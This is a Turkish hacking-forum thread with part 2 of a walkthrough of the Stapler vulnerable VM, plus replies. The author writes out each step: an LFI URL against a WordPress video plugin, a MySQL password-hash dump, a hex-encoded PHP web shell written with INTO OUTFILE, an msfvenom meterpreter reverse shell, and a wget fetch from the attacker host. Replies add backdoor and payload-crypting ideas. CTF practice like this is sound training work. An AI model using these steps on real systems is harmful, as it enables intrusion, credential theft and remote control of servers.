İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Pentest Challange: Stapler (Part 2)

09-06-2017 03:22
#1
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
233
Teşekkür (Etti):
55
Teşekkür (Aldı):
198
Konular:
34
Kaldığımız yerden devam ediyoruz.
Part 1:
http://www.turkhackteam.org/siber-guvenlik/1524290-pentest-challange-stapler-part-1-a.html


Ve bunlar olurken ben bir sıkıntı ile karşılaşıp hedef cihazın ip adresini değiştirmek zorunda kaldım.
Wpscan programına herhangi bir eklenti eklemediğimiz sürece bize lazım olucak açığı vermeyecektir.
Eklentimizi --enumerate ap parametresi ile ekliyoruz.
wpscan -u https://192.168.43.149:12380/blogblog --enumerate ap



Evet karşımıza 4 tane plugin sonucu çıktı.
Bu pluginlerden "embed video" olan seçeneğini kullanıcaz.
Açığı sömürebilmemiz için doğru exploiti arıcaz.

searchsploit advanced video



Evet karşımıza kullanabileceğimiz bir tane exploit çıkardı.
Bize gösterdiği yeri açıp exploitimizin nasıl kullanıldığını öğreniyoruz.




Exploitten anladığımız kadarıyla LFI denicez.
LFI deki mantık gayet basittir.
Urldeki yönlendirmeyi linux klasör sistemine göre çeviriceksiniz.
1&thumb= kısmından sonraki yere ../ koyarsanız bir üst dizine çıkarsınız.
Bunu nekadar tekrarlar iseniz root dizinine ulaşmanız bi okadar hızlı olur.
Bende bunu kullanarak /etc/passwd kısmına yöneldim.
(Ki benbunları söylerken ben ../ ı az kullandığımdan istediğim yere gelemedim, ancak bunu yaparkende yapmam gerekenide yapmış oldum.)
https://192.168.43.149:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short =1&term=1&thumb=../../../../../etc/passwd



Ve her F5 tuşuna bastığımda sayfadaki değerin arttığını gördüm.
Amacım sayfaya girebilmekti ancak sayfaya girmeye çalışırken 404 hatası alıyordum.

Ama anamenüye dönünce karşımda daha önce orada olmayan sayfaların açıldığını fark ettim.



Uzun denemeler sonucunda ne yapmam gerektiğini kavradım.
Yeni açılan adı "RANDOM" olan sayfaların üzerindeki .jpeg dosyasını indirmeyi düşündüm.

Ama dosya açılmayıp başka sayfaya aktarıyordu.
Bir arkadaşıma sordum sıkıntımı ve akla sığmıcak bir cevap verdi.


-Kaptan şimdi benim böyle böyle sıkıntım var ve resimi indirmek istiyorum sence ne yapalım?
+ CURL DENE
(Tabi bukadar kısa olmadı konuşma )


Denediğimde sevindiren bir sonuçla ekrana baktım.



Ne güzel.
Burda verilen bilgiler MySQL bilgileri olduğu zaten anlatılmış.
Bizde bu bilgileri kullanarak mysql kısmına giricez.

mysql -h 192.168.43.149 -u root -p



Anlaşılan oki karşı tarafın database kısmına eriştik.
Bunu kullanabilmemiz içinde şifrelerin kayıtlı tutuldüğü kısma geçmemiz lazım.

(Burada fotoğraf koyabilirdim ancak çok fazla fotoğraf olucağından artık daha tasarruflu olmamız gerekmekte.)
Sırasıyla kodlarımı giriyorum.
show databases;
use wordpress
show tables;
select * from wp_users;




Evet sizinde çok az gördüğünüz üzere hedefin databaseinde bulunan kişilerin ismi ve şifre hashleriyle aldık.
(Sözüm web hackerlarına: Sanki bu tema size bir yerden tanıdık geliyor demi? )
Ama bunları kırmamız lazım.
Bu işi güzel bir wordlist ile jhon abimize verebiliriz.


Kendimize bir + verelim.
1 - 256 oranla kaybediyoruz.
Ama yılmadan devam etmemiz lazım.


Gel zaman git zaman şifrelerin hepsi kırılır ve hiç bir işe yaramadan çöpe atılır.

Belli başlı boş denemeleri yapmaya yeniden döndük.
Ve Google amacamıza muhtaç kaldık ve benim için yeni olan bir shell upload taktiği öğrendim.
İsterseniz gelin beraber görelim.


select 0x3c3f2053797374656d28285b27636d64275d293b203f3e into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";



Böyle güzel bir haraket yaparak hedefte bir shell dosyasını upload edebilirsiniz.
Bu shell dosyasının içinden komut vererek bizdeki php RAT dosyasını almasını istiyeceğiz.

Php RAT dosyasını msfvenom aracı ile yapabiliriz.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.200 lport=25642 R > /var/www/html/final.php



RAT dosyamızda sıkıntısız bir biçimde oluşturuldu.
Şimdi ise son hamlalere doğru php RAT dosyasını upload edip çalıştırıcaz.

https://192.168.43.149:12380/blogblog/wp-content/uploads/shell.php?cmd= wget 192.168.43.200/final.php

Upload başarılı oldu ve uploads kısmına gidip final.php dosyamızı çalıştırdığımızda meterpreter sezonumuz açılıyor



Sonunda girebildik

Benim için yeterince zor oldu.(5 saat)
Umarım zisin için okuması kolay olmuştur.
Bu seferki için part halinde yapmak zorunda kaldım umarım afedersiniz.


Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.


HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.
Konu Belvando tarafından (09-06-2017 03:23 Saat 03:23 ) değiştirilmiştir.

09-06-2017 04:04
#2
faucheuse - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Mesajlar:
786
Teşekkür (Etti):
185
Teşekkür (Aldı):
42
Konular:
29
Senin bu konularına bayılıyorum inşallah devam edersin
09-06-2017 04:59
#3
Rojang - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
11
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Konular:
3
Ellerine Saglik Saglam Konu Olmus
09-06-2017 05:10
#4
b0mb - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
İzmir
Yaş:
17
Mesajlar:
471
Teşekkür (Etti):
143
Teşekkür (Aldı):
219
Konular:
64
Databasede bulunan kullanıcların şifrelenmiş parolalarından birini kendi oluşturduğun bir hash ile değiştirseydin bu kadar uğraşmana gerek kalmazdı. Ellerine sağlık güzel bir konu olmuş.
10-06-2017 00:29
#5
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
233
Teşekkür (Etti):
55
Teşekkür (Aldı):
198
Konular:
34
Alıntı:
b0mb´isimli üyeden Alıntı Mesajı göster
Databasede bulunan kullanıcların şifrelenmiş parolalarından birini kendi oluşturduğun bir hash ile değiştirseydin bu kadar uğraşmana gerek kalmazdı. Ellerine sağlık güzel bir konu olmuş.
Evet gayet mantıklı ancak oradaki değişiklik sadece wordpress sayfasına girmeme yarardı.
Bizim amacımız karşı tarafa sızabilmek.
Ve ben o parolaları bulduktan sonra ssh a bağlantıda kullanmayı denedim ve sonuç olumsuz.
BÖyle birşey olacağı belliydi zaten.
10-06-2017 00:51
#6
b0mb - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
İzmir
Yaş:
17
Mesajlar:
471
Teşekkür (Etti):
143
Teşekkür (Aldı):
219
Konular:
64
Alıntı:
Belvando´isimli üyeden Alıntı Mesajı göster
Evet gayet mantıklı ancak oradaki değişiklik sadece wordpress sayfasına girmeme yarardı.
Bizim amacımız karşı tarafa sızabilmek.
Ve ben o parolaları bulduktan sonra ssh a bağlantıda kullanmayı denedim ve sonuç olumsuz.
BÖyle birşey olacağı belliydi zaten.
Sayfaya girip weevely ile backdoor atardım ben, o yüzden dedim
10-06-2017 01:00
#7
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
233
Teşekkür (Etti):
55
Teşekkür (Aldı):
198
Konular:
34
Alıntı:
b0mb´isimli üyeden Alıntı Mesajı göster
Sayfaya girip weevely ile backdoor atardım ben, o yüzden dedim
Evet aklıma geldi ancak ben ubuntu kullanıyorum ve weevely kurmadığımdan yapmadım.
Ama sizsinde üretebileceğiniz bir sürü yöntem var.
Weevely sadece bir yöntem başka da olur.
Örnek vermek gerekirse direk mysql üzerinden updates kısmına msfvenom dan oluşturulmuş php ratınıda cryptleyip atabilirdim.
10-06-2017 01:03
#8
b0mb - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
İzmir
Yaş:
17
Mesajlar:
471
Teşekkür (Etti):
143
Teşekkür (Aldı):
219
Konular:
64
Alıntı:
Belvando´isimli üyeden Alıntı Mesajı göster
Evet aklıma geldi ancak ben ubuntu kullanıyorum ve weevely kurmadığımdan yapmadım.
Ama sizsinde üretebileceğiniz bir sürü yöntem var.
Weevely sadece bir yöntem başka da olur.
Örnek vermek gerekirse direk mysql üzerinden updates kısmına msfvenom dan oluşturulmuş php ratınıda cryptleyip atabilirdim.
Güzel bir labmış bu, indirip uğraşayım biraz. Eline sağlık tekrardan
10-06-2017 01:25
#9
BAMSIBEY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
------
Mesajlar:
521
Teşekkür (Etti):
296
Teşekkür (Aldı):
61
Konular:
32
Elinde sağlık kardeşim
21-06-2017 00:32
#10
Üyelik tarihi:
06/2017
Yaş:
28
Mesajlar:
109
Teşekkür (Etti):
1
Teşekkür (Aldı):
4
Konular:
9
Teşekkür Ederim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı